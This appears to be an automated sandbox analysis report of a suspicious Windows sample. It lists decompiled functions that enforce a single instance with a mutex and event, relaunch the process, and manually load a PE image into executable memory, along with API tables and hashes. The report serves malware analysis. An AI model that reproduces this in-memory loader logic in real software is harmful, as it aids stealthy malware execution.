                                                                                        							CloseHandle(_t70);
                                                                                        							CloseHandle(_t67);
                                                                                        							E00D19C50(0xd11000);
                                                                                        							return 1;
                                                                                        						}
                                                                                        					} else {
                                                                                        						CloseHandle(_t70);
                                                                                        						goto L4;
                                                                                        					}
                                                                                        				}
                                                                                        			}



















                                                                                        0x00d115c9
                                                                                        0x00d115cf
                                                                                        0x00d115d5
                                                                                        0x00d115d9
                                                                                        0x00d115df
                                                                                        0x00d115ef
                                                                                        0x00d115f4
                                                                                        0x00d11602
                                                                                        0x00d11615
                                                                                        0x00d1162e
                                                                                        0x00d11633
                                                                                        0x00d11641
                                                                                        0x00d11654
                                                                                        0x00d1166d
                                                                                        0x00d11671
                                                                                        0x00d11692
                                                                                        0x00d11698
                                                                                        0x00d11673
                                                                                        0x00d1167e
                                                                                        0x00d11684
                                                                                        0x00d11688
                                                                                        0x00d116a4
                                                                                        0x00d116d3
                                                                                        0x00d116dc
                                                                                        0x00d116e6
                                                                                        0x00d11707
                                                                                        0x00d1170f
                                                                                        0x00000000
                                                                                        0x00d11711
                                                                                        0x00d11714
                                                                                        0x00d1171d
                                                                                        0x00d11726
                                                                                        0x00d1172d
                                                                                        0x00d11734
                                                                                        0x00d11744
                                                                                        0x00d11744
                                                                                        0x00d116a6
                                                                                        0x00d116a7
                                                                                        0x00d116ae
                                                                                        0x00d116b5
                                                                                        0x00d116bb
                                                                                        0x00d116ca
                                                                                        0x00d116ca
                                                                                        0x00d1168a
                                                                                        0x00d1168b
                                                                                        0x00000000
                                                                                        0x00d1168b
                                                                                        0x00d11688

                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 00D115C9
                                                                                          • Part of subcall function 00D11830: GetProcessHeap.KERNEL32(00000008,00D19F6B,00000000,00000000,00D11004,?,00D115F4,4DBAC13F,00D19F6B,?,00000000), ref: 00D11844
                                                                                          • Part of subcall function 00D11830: RtlAllocateHeap.NTDLL(00000000,?,00D115F4), ref: 00D1184B
                                                                                        • _snwprintf.NTDLL ref: 00D11602
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D19F6B), ref: 00D1160E
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D11615
                                                                                        • _snwprintf.NTDLL ref: 00D11641
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D19F6B), ref: 00D1164D
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D11654
                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00D11667
                                                                                        • CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 00D1167E
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00D1168B
                                                                                        • GetLastError.KERNEL32 ref: 00D11699
                                                                                        • SetEvent.KERNEL32(00000000), ref: 00D116A7
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00D116AE
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00D116B5
                                                                                        • memset.NTDLL ref: 00D116D3
                                                                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00D11707
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00D11714
                                                                                        • CloseHandle.KERNEL32(?), ref: 00D1171D
                                                                                        • CloseHandle.KERNEL32(?), ref: 00D11726
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00D1172D
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00D11734
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$Heap$Process$Create$EventFree_snwprintf$AllocateErrorFileLastModuleMutexNameObjectSingleWaitmemset
                                                                                        • String ID: D
                                                                                        • API String ID: 2830143876-2746444292
                                                                                        • Opcode ID: 4d92633ab8eafbbf0de5b041bb40f135332c90b4727f7365dd8eba426a7b9014
                                                                                        • Instruction ID: 1f40cf4d0faccb6cfc3eca8da6a2c4f0e87620f9522ae6ae27d5d91a320a50fe
                                                                                        • Opcode Fuzzy Hash: 4d92633ab8eafbbf0de5b041bb40f135332c90b4727f7365dd8eba426a7b9014
                                                                                        • Instruction Fuzzy Hash: 2641A1359D0318BBEB109BA4EC09FEE7B7CEB44311F044051FA08E6291DF349A828BB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        C-Code - Quality: 84%
                                                                                        			E00D11599(signed int __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __esi, void* __fp0) {
                                                                                        				void* _v8;
                                                                                        				struct _PROCESS_INFORMATION _v24;
                                                                                        				struct _STARTUPINFOW _v92;
                                                                                        				short _v220;
                                                                                        				short _v348;
                                                                                        				short _v868;
                                                                                        				short _v876;
                                                                                        				intOrPtr* _t27;
                                                                                        				void* _t44;
                                                                                        				int _t51;
                                                                                        				WCHAR* _t66;
                                                                                        				void* _t71;
                                                                                        				intOrPtr _t73;
                                                                                        				void* _t75;
                                                                                        				void* _t79;
                                                                                        				void* _t80;
                                                                                        				void* _t81;
                                                                                        				void* _t85;
                                                                                        				intOrPtr* _t90;
                                                                                        
                                                                                        				asm("daa");
                                                                                        				_t71 = __edx -  *_t90;
                                                                                        				asm("salc");
                                                                                        				 *((intOrPtr*)(__esi + 2)) =  *((intOrPtr*)(__esi + 2)) + (__eax | 0x0000004a);
                                                                                        				_t73 =  *__ecx;
                                                                                        				GetModuleFileNameW(0,  &_v876, 0x104);
                                                                                        				_t66 =  &_v876;
                                                                                        				_t27 = E00D119E0(_t66);
                                                                                        				 *((intOrPtr*)(__ebx + 0x4baf8)) =  *((intOrPtr*)(__ebx + 0x4baf8)) + _t66;
                                                                                        				 *_t27 =  *_t27 + _t27;
                                                                                        				E00D11830(0xd11004, _t71, 0x4dbac13f,  &_v8);
                                                                                        				_t79 = _v8;
                                                                                        				 *0xd1c200( &_v348, 0x40, _t79, _t73, _t73, __esi, _t85, _t90, cs);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t79);
                                                                                        				E00D11830(0xd11000, 4, 0x4dbac13f,  &_v8);
                                                                                        				_t80 = _v8;
                                                                                        				 *0xd1c200( &_v220, 0x40, _t80, _t73);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t80);
                                                                                        				_t81 = CreateEventW(0, 1, 0,  &_v348);
                                                                                        				if(_t81 == 0) {
                                                                                        					L5:
                                                                                        					return 0;
                                                                                        				} else {
                                                                                        					_t44 = CreateMutexW(0, 1,  &_v220); // executed
                                                                                        					_t75 = _t44;
                                                                                        					if(_t75 != 0) {
                                                                                        						if(GetLastError() != 0xb7) {
                                                                                        							memset( &_v92, 0, 0x44);
                                                                                        							_v92.cb = 0x44;
                                                                                        							_v92.dwFlags = 0x80;
                                                                                        							_t51 = CreateProcessW( &_v868, 0, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24); // executed
                                                                                        							if(_t51 == 0) {
                                                                                        								goto L5;
                                                                                        							} else {
                                                                                        								WaitForSingleObject(_t81, 0xffffffff);
                                                                                        								CloseHandle(_v24);
                                                                                        								CloseHandle(_v24.hThread);
                                                                                        								CloseHandle(_t81);
                                                                                        								CloseHandle(_t75);
                                                                                        								return 1;
                                                                                        							}
                                                                                        						} else {
                                                                                        							SetEvent(_t81);
                                                                                        							CloseHandle(_t81);
                                                                                        							CloseHandle(_t75);
                                                                                        							E00D19C50(0xd11000);
                                                                                        							return 1;
                                                                                        						}
                                                                                        					} else {
                                                                                        						CloseHandle(_t81);
                                                                                        						goto L5;
                                                                                        					}
                                                                                        				}
                                                                                        			}






















                                                                                        0x00d11599
                                                                                        0x00d1159d
                                                                                        0x00d115a5
                                                                                        0x00d115a6
                                                                                        0x00d115a9
                                                                                        0x00d115c9
                                                                                        0x00d115cf
                                                                                        0x00d115d5
                                                                                        0x00d115d9
                                                                                        0x00d115df
                                                                                        0x00d115ef
                                                                                        0x00d115f4
                                                                                        0x00d11602
                                                                                        0x00d11615
                                                                                        0x00d1162e
                                                                                        0x00d11633
                                                                                        0x00d11641
                                                                                        0x00d11654
                                                                                        0x00d1166d
                                                                                        0x00d11671
                                                                                        0x00d11691
                                                                                        0x00d11698
                                                                                        0x00d11673
                                                                                        0x00d1167e
                                                                                        0x00d11684
                                                                                        0x00d11688
                                                                                        0x00d116a4
                                                                                        0x00d116d3
                                                                                        0x00d116dc
                                                                                        0x00d116e6
                                                                                        0x00d11707
                                                                                        0x00d1170f
                                                                                        0x00000000
                                                                                        0x00d11711
                                                                                        0x00d11714
                                                                                        0x00d1171d
                                                                                        0x00d11726
                                                                                        0x00d1172d
                                                                                        0x00d11734
                                                                                        0x00d11744
                                                                                        0x00d11744
                                                                                        0x00d116a6
                                                                                        0x00d116a7
                                                                                        0x00d116ae
                                                                                        0x00d116b5
                                                                                        0x00d116bb
                                                                                        0x00d116ca
                                                                                        0x00d116ca
                                                                                        0x00d1168a
                                                                                        0x00d1168b
                                                                                        0x00000000
                                                                                        0x00d1168b
                                                                                        0x00d11688

                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 00D115C9
                                                                                          • Part of subcall function 00D11830: GetProcessHeap.KERNEL32(00000008,00D19F6B,00000000,00000000,00D11004,?,00D115F4,4DBAC13F,00D19F6B,?,00000000), ref: 00D11844
                                                                                          • Part of subcall function 00D11830: RtlAllocateHeap.NTDLL(00000000,?,00D115F4), ref: 00D1184B
                                                                                        • _snwprintf.NTDLL ref: 00D11602
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D19F6B), ref: 00D1160E
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D11615
                                                                                        • _snwprintf.NTDLL ref: 00D11641
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D19F6B), ref: 00D1164D
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D11654
                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00D11667
                                                                                        • CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 00D1167E
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00D1168B
                                                                                        • GetLastError.KERNEL32 ref: 00D11699
                                                                                        • SetEvent.KERNEL32(00000000), ref: 00D116A7
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00D116AE
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00D116B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$CloseHandleProcess$CreateEventFree_snwprintf$AllocateErrorFileLastModuleMutexName
                                                                                        • String ID:
                                                                                        • API String ID: 4183562332-0
                                                                                        • Opcode ID: 9a0b8dee54648f08881ca5bce5478517a71f15d1afed6b591db0aeddbdc7aba6
                                                                                        • Instruction ID: f6ecc663f3c5fdacdb093147b28edecd3d9097abf6f61fc078cea7d7065d59f5
                                                                                        • Opcode Fuzzy Hash: 9a0b8dee54648f08881ca5bce5478517a71f15d1afed6b591db0aeddbdc7aba6
                                                                                        • Instruction Fuzzy Hash: 7E21D8316D0245BFEB1097A0DC09FDA3B7DEB44311F048091FA08E6281DE309A868BB4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        C-Code - Quality: 80%
                                                                                        			E00D11575(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __fp0) {
                                                                                        				void* _v4;
                                                                                        				struct _PROCESS_INFORMATION _v20;
                                                                                        				struct _STARTUPINFOW _v88;
                                                                                        				short _v216;
                                                                                        				short _v344;
                                                                                        				short _v864;
                                                                                        				void* _v880;
                                                                                        				signed char _t34;
                                                                                        				void* _t51;
                                                                                        				int _t58;
                                                                                        				signed char _t71;
                                                                                        				signed char _t73;
                                                                                        				void* _t78;
                                                                                        				void* _t79;
                                                                                        				void* _t82;
                                                                                        				void* _t84;
                                                                                        				signed char _t87;
                                                                                        				void* _t89;
                                                                                        				void* _t91;
                                                                                        				void* _t95;
                                                                                        				void* _t96;
                                                                                        				void* _t97;
                                                                                        				void* _t105;
                                                                                        				void* _t127;
                                                                                        
                                                                                        				L0:
                                                                                        				while(1) {
                                                                                        					_t84 = __edx;
                                                                                        					_t79 = __ecx;
                                                                                        					_t78 = __ebx;
                                                                                        					_t127 = __fp0 -  *[fs:edx];
                                                                                        					_t34 = __eax + 0x527dd026 | 0x0000004a;
                                                                                        					asm("fistp qword [ecx+ebx]");
                                                                                        					if(__ecx >= _t34) {
                                                                                        						break;
                                                                                        					}
                                                                                        					L14:
                                                                                        					_t127 = _t127 -  *[fs:edx];
                                                                                        					_t71 = _t73 | 0x0000004a;
                                                                                        					asm("retf");
                                                                                        					_t79 = _t82 - _t105;
                                                                                        					asm("daa");
                                                                                        					_push(__ebx);
                                                                                        					if (_t79 < 0) goto L5;
                                                                                        					L15:
                                                                                        					_t87 = _t71;
                                                                                        				}
                                                                                        				L19:
                                                                                        				 *((intOrPtr*)(_t78 + 0x4baf8)) =  *((intOrPtr*)(_t78 + 0x4baf8)) + _t79;
                                                                                        				 *_t34 =  *_t34 + _t34;
                                                                                        				E00D11830(0xd11004, _t84, 0x4dbac13f,  &_v4);
                                                                                        				_t95 = _v4;
                                                                                        				 *0xd1c200( &_v344, 0x40, _t95, _t89);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t95);
                                                                                        				E00D11830(0xd11000, 4, 0x4dbac13f,  &_v4);
                                                                                        				_t96 = _v4;
                                                                                        				 *0xd1c200( &_v216, 0x40, _t96, _t89);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t96);
                                                                                        				_t97 = CreateEventW(0, 1, 0,  &_v344);
                                                                                        				if(_t97 == 0) {
                                                                                        					L22:
                                                                                        					return 0;
                                                                                        				} else {
                                                                                        					_t51 = CreateMutexW(0, 1,  &_v216); // executed
                                                                                        					_t91 = _t51;
                                                                                        					if(_t91 != 0) {
                                                                                        						if(GetLastError() != 0xb7) {
                                                                                        							memset( &_v88, 0, 0x44);
                                                                                        							_v88.cb = 0x44;
                                                                                        							_v88.dwFlags = 0x80;
                                                                                        							_t58 = CreateProcessW( &_v864, 0, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20); // executed
                                                                                        							if(_t58 == 0) {
                                                                                        								goto L22;
                                                                                        							} else {
                                                                                        								WaitForSingleObject(_t97, 0xffffffff);
                                                                                        								CloseHandle(_v20);
                                                                                        								CloseHandle(_v20.hThread);
                                                                                        								CloseHandle(_t97);
                                                                                        								CloseHandle(_t91);
                                                                                        								return 1;
                                                                                        							}
                                                                                        						} else {
                                                                                        							SetEvent(_t97);
                                                                                        							CloseHandle(_t97);
                                                                                        							CloseHandle(_t91);
                                                                                        							E00D19C50(0xd11000);
                                                                                        							return 1;
                                                                                        						}
                                                                                        					} else {
                                                                                        						CloseHandle(_t97);
                                                                                        						goto L22;
                                                                                        					}
                                                                                        				}
                                                                                        			}



























                                                                                        0x00d11575
                                                                                        0x00d11575
                                                                                        0x00d11575
                                                                                        0x00d11575
                                                                                        0x00d11575
                                                                                        0x00d1157b
                                                                                        0x00d1157e
                                                                                        0x00d11580
                                                                                        0x00d11585
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d11587
                                                                                        0x00d11587
                                                                                        0x00d1158a
                                                                                        0x00d1158c
                                                                                        0x00d1158f
                                                                                        0x00d11591
                                                                                        0x00d11592
                                                                                        0x00d11593
                                                                                        0x00d11594
                                                                                        0x00d11594
                                                                                        0x00d11594
                                                                                        0x00d115d9
                                                                                        0x00d115d9
                                                                                        0x00d115df
                                                                                        0x00d115ef
                                                                                        0x00d115f4
                                                                                        0x00d11602
                                                                                        0x00d11615
                                                                                        0x00d1162e
                                                                                        0x00d11633
                                                                                        0x00d11641
                                                                                        0x00d11654
                                                                                        0x00d1166d
                                                                                        0x00d11671
                                                                                        0x00d11691
                                                                                        0x00d11698
                                                                                        0x00d11673
                                                                                        0x00d1167e
                                                                                        0x00d11684
                                                                                        0x00d11688
                                                                                        0x00d116a4
                                                                                        0x00d116d3
                                                                                        0x00d116dc
                                                                                        0x00d116e6
                                                                                        0x00d11707
                                                                                        0x00d1170f
                                                                                        0x00000000
                                                                                        0x00d11711
                                                                                        0x00d11714
                                                                                        0x00d1171d
                                                                                        0x00d11726
                                                                                        0x00d1172d
                                                                                        0x00d11734
                                                                                        0x00d11744
                                                                                        0x00d11744
                                                                                        0x00d116a6
                                                                                        0x00d116a7
                                                                                        0x00d116ae
                                                                                        0x00d116b5
                                                                                        0x00d116bb
                                                                                        0x00d116ca
                                                                                        0x00d116ca
                                                                                        0x00d1168a
                                                                                        0x00d1168b
                                                                                        0x00000000
                                                                                        0x00d1168b
                                                                                        0x00d11688

                                                                                        APIs
                                                                                        • _snwprintf.NTDLL ref: 00D11602
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D19F6B), ref: 00D1160E
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D11615
                                                                                        • _snwprintf.NTDLL ref: 00D11641
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D19F6B), ref: 00D1164D
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D11654
                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00D11667
                                                                                        • CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 00D1167E
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00D1168B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$CreateFreeProcess_snwprintf$CloseEventHandleMutex
                                                                                        • String ID:
                                                                                        • API String ID: 2595929981-0
                                                                                        • Opcode ID: 9980a846f2b53c096fdbc544d74d179627bc4fcd0dda2197e320d4f54c3721f3
                                                                                        • Instruction ID: 643da2cf9e11802e4251bb385cebf4d83c2e75afaa9fc30277571633a7920142
                                                                                        • Opcode Fuzzy Hash: 9980a846f2b53c096fdbc544d74d179627bc4fcd0dda2197e320d4f54c3721f3
                                                                                        • Instruction Fuzzy Hash: 2121D475994255BBEB219BA09C09FDA3778EB45741F044091FA08EA381CE3089C68770
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        C-Code - Quality: 100%
                                                                                        			E00D11F40(void* __ecx, void* __edx) {
                                                                                        				intOrPtr* _v8;
                                                                                        				intOrPtr _v12;
                                                                                        				intOrPtr* _v16;
                                                                                        				struct HINSTANCE__* _v20;
                                                                                        				intOrPtr _t55;
                                                                                        				struct HINSTANCE__* _t59;
                                                                                        				intOrPtr _t60;
                                                                                        				intOrPtr _t61;
                                                                                        				signed short _t65;
                                                                                        				CHAR* _t68;
                                                                                        				_Unknown_base(*)()* _t69;
                                                                                        				intOrPtr* _t70;
                                                                                        				signed int _t71;
                                                                                        				void* _t79;
                                                                                        				intOrPtr _t81;
                                                                                        				struct HINSTANCE__* _t82;
                                                                                        				void* _t85;
                                                                                        				intOrPtr _t86;
                                                                                        				signed short* _t89;
                                                                                        				void* _t90;
                                                                                        				intOrPtr* _t91;
                                                                                        				_Unknown_base(*)()** _t93;
                                                                                        				void* _t96;
                                                                                        				intOrPtr* _t99;
                                                                                        				void* _t102;
                                                                                        				intOrPtr* _t104;
                                                                                        				signed short* _t106;
                                                                                        				void* _t108;
                                                                                        				void* _t109;
                                                                                        				signed short _t128;
                                                                                        
                                                                                        				_t79 = 0;
                                                                                        				_t90 = __ecx;
                                                                                        				if(__edx <= 0x40 ||  *((intOrPtr*)(__ecx)) != 0x5a4d) {
                                                                                        					L33:
                                                                                        					return _t79;
                                                                                        				} else {
                                                                                        					_t99 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
                                                                                        					_v8 = _t99;
                                                                                        					if( *_t99 != 0x4550 ||  *((intOrPtr*)(_t99 + 0x18)) != 0x10b) {
                                                                                        						L32:
                                                                                        						goto L33;
                                                                                        					} else {
                                                                                        						_t79 = VirtualAlloc(0,  *(_t99 + 0x50), 0x3000, 0x40);
                                                                                        						if(_t79 != 0) {
                                                                                        							memcpy(_t79, _t90,  *(_t99 + 0x54));
                                                                                        							_t109 = _t108 + 0xc;
                                                                                        							_t81 = _v8;
                                                                                        							_t102 = _t99 + 0x18 + ( *(_t99 + 0x14) & 0x0000ffff);
                                                                                        							_t55 = _t102 + (( *(_t81 + 6) & 0x0000ffff) + ( *(_t81 + 6) & 0x0000ffff) * 4) * 8;
                                                                                        							_v12 = _t55;
                                                                                        							if(_t102 < _t55) {
                                                                                        								do {
                                                                                        									_t86 =  *((intOrPtr*)(_t102 + 0x10));
                                                                                        									_t87 =  <  ?  *((void*)(_t102 + 8)) : _t86;
                                                                                        									memcpy( *((intOrPtr*)(_t102 + 0xc)) + _t79,  *((intOrPtr*)(_t102 + 0x14)) + _t90,  <  ?  *((void*)(_t102 + 8)) : _t86);
                                                                                        									_t102 = _t102 + 0x28;
                                                                                        									_t109 = _t109 + 0xc;
                                                                                        								} while (_t102 < _v12);
                                                                                        								_t81 = _v8;
                                                                                        							}
                                                                                        							_t104 =  *((intOrPtr*)(_t81 + 0xa0)) + _t79;
                                                                                        							_v12 = _t79 -  *((intOrPtr*)(_t81 + 0x34));
                                                                                        							_t59 =  *((intOrPtr*)(_t81 + 0xa4)) + _t104;
                                                                                        							_v20 = _t59;
                                                                                        							if(_t104 < _t59) {
                                                                                        								do {
                                                                                        									_t70 = _t104 + 4;
                                                                                        									_t96 =  *((intOrPtr*)(_t104 + 4)) + _t104;
                                                                                        									_v16 = _t70;
                                                                                        									_t89 = _t104 + 8;
                                                                                        									if(_t89 < _t96) {
                                                                                        										do {
                                                                                        											_t71 =  *_t89 & 0x0000ffff;
                                                                                        											_t85 = (_t71 & 0x00000fff) +  *_t104;
                                                                                        											if((_t71 & 0x0000f000) == 0x3000) {
                                                                                        												 *((intOrPtr*)(_t85 + _t79)) =  *((intOrPtr*)(_t85 + _t79)) + _v12;
                                                                                        											}
                                                                                        											_t89 =  &(_t89[1]);
                                                                                        										} while (_t89 < _t96);
                                                                                        										_t70 = _v16;
                                                                                        									}
                                                                                        									_t104 = _t104 +  *_t70;
                                                                                        								} while (_t104 < _v20);
                                                                                        								_t81 = _v8;
                                                                                        							}
                                                                                        							_t60 =  *((intOrPtr*)(_t81 + 0x80));
                                                                                        							if(_t60 != 0 &&  *((intOrPtr*)(_t81 + 0x84)) != 0) {
                                                                                        								_t91 = _t60 + _t79;
                                                                                        								_t61 =  *((intOrPtr*)(_t91 + 0xc));
                                                                                        								_v8 = _t91;
                                                                                        								if(_t61 != 0) {
                                                                                        									while(1) {
                                                                                        										_t82 = LoadLibraryA(_t61 + _t79);
                                                                                        										_v20 = _t82;
                                                                                        										if(_t82 == 0) {
                                                                                        											break;
                                                                                        										}
                                                                                        										_t106 =  *_t91 + _t79;
                                                                                        										_t93 =  *((intOrPtr*)(_t91 + 0x10)) + _t79;
                                                                                        										_t65 =  *_t106;
                                                                                        										_t128 = _t65;
                                                                                        										if(_t128 == 0) {
                                                                                        											L29:
                                                                                        											_t91 = _v8 + 0x14;
                                                                                        											_v8 = _t91;
                                                                                        											_t61 =  *((intOrPtr*)(_t91 + 0xc));
                                                                                        											if(_t61 != 0) {
                                                                                        												continue;
                                                                                        											} else {
                                                                                        												return _t79;
                                                                                        											}
                                                                                        										} else {
                                                                                        											L24:
                                                                                        											L24:
                                                                                        											if(_t128 >= 0) {
                                                                                        												_t68 = _t65 + 2 + _t79;
                                                                                        											} else {
                                                                                        												_t68 = _t65 & 0x0000ffff;
                                                                                        											}
                                                                                        											_t69 = GetProcAddress(_t82, _t68);
                                                                                        											if(_t69 == 0) {
                                                                                        												break;
                                                                                        											}
                                                                                        											_t82 = _v20;
                                                                                        											_t106 =  &(_t106[2]);
                                                                                        											 *_t93 = _t69;
                                                                                        											_t93 = _t93 + 4;
                                                                                        											_t65 =  *_t106;
                                                                                        											if(_t65 != 0) {
                                                                                        												goto L24;
                                                                                        											} else {
                                                                                        												goto L29;
                                                                                        											}
                                                                                        										}
                                                                                        										goto L34;
                                                                                        									}
                                                                                        									VirtualFree(_t79, 0, 0x8000);
                                                                                        									_t79 = 0;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						goto L32;
                                                                                        					}
                                                                                        				}
                                                                                        				L34:
                                                                                        			}

































                                                                                        0x00d11f47
                                                                                        0x00d11f4a
                                                                                        0x00d11f4f
                                                                                        0x00d12105
                                                                                        0x00d1210b
                                                                                        0x00d11f63
                                                                                        0x00d11f67
                                                                                        0x00d11f69
                                                                                        0x00d11f72
                                                                                        0x00d12103
                                                                                        0x00000000
                                                                                        0x00d11f87
                                                                                        0x00d11f98
                                                                                        0x00d11f9c
                                                                                        0x00d11fa7
                                                                                        0x00d11fb1
                                                                                        0x00d11fb4
                                                                                        0x00d11fba
                                                                                        0x00d11fc3
                                                                                        0x00d11fc6
                                                                                        0x00d11fcb
                                                                                        0x00d11fd0
                                                                                        0x00d11fd0
                                                                                        0x00d11fd9
                                                                                        0x00d11fe7
                                                                                        0x00d11fed
                                                                                        0x00d11ff0
                                                                                        0x00d11ff3
                                                                                        0x00d11ff8
                                                                                        0x00d11ff8
                                                                                        0x00d12006
                                                                                        0x00d12008
                                                                                        0x00d12011
                                                                                        0x00d12013
                                                                                        0x00d12018
                                                                                        0x00d12020
                                                                                        0x00d12023
                                                                                        0x00d12026
                                                                                        0x00d12028
                                                                                        0x00d1202b
                                                                                        0x00d12030
                                                                                        0x00d12032
                                                                                        0x00d12032
                                                                                        0x00d12042
                                                                                        0x00d12049
                                                                                        0x00d1204e
                                                                                        0x00d1204e
                                                                                        0x00d12051
                                                                                        0x00d12054
                                                                                        0x00d12058
                                                                                        0x00d12058
                                                                                        0x00d1205b
                                                                                        0x00d1205d
                                                                                        0x00d12062
                                                                                        0x00d12062
                                                                                        0x00d12065
                                                                                        0x00d1206d
                                                                                        0x00d12080
                                                                                        0x00d12083
                                                                                        0x00d12086
                                                                                        0x00d1208b
                                                                                        0x00d12090
                                                                                        0x00d12099
                                                                                        0x00d1209b
                                                                                        0x00d120a0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d120a7
                                                                                        0x00d120a9
                                                                                        0x00d120ab
                                                                                        0x00d120ad
                                                                                        0x00d120af
                                                                                        0x00d120da
                                                                                        0x00d120dd
                                                                                        0x00d120e0
                                                                                        0x00d120e3
                                                                                        0x00d120e8
                                                                                        0x00000000
                                                                                        0x00d120ea
                                                                                        0x00d120f2
                                                                                        0x00d120f2
                                                                                        0x00d120b1
                                                                                        0x00000000
                                                                                        0x00d120b1
                                                                                        0x00d120b1
                                                                                        0x00d120bb
                                                                                        0x00d120b3
                                                                                        0x00d120b3
                                                                                        0x00d120b3
                                                                                        0x00d120bf
                                                                                        0x00d120c7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d120c9
                                                                                        0x00d120cc
                                                                                        0x00d120cf
                                                                                        0x00d120d1
                                                                                        0x00d120d4
                                                                                        0x00d120d8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d120d8
                                                                                        0x00000000
                                                                                        0x00d120af
                                                                                        0x00d120fb
                                                                                        0x00d12101
                                                                                        0x00d12101
                                                                                        0x00d1208b
                                                                                        0x00d1206d
                                                                                        0x00000000
                                                                                        0x00d11f9c
                                                                                        0x00d11f72
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,00000000,00000080,00D18A23,?,000DBBA0), ref: 00D11F92
                                                                                        • memcpy.NTDLL(00000000,?,?,?,000DBBA0,?,?,?,?,?,?,?,00D18F82), ref: 00D11FA7
                                                                                        • memcpy.NTDLL(?,?,?), ref: 00D11FE7
                                                                                        • LoadLibraryA.KERNEL32(00D18F82), ref: 00D12093
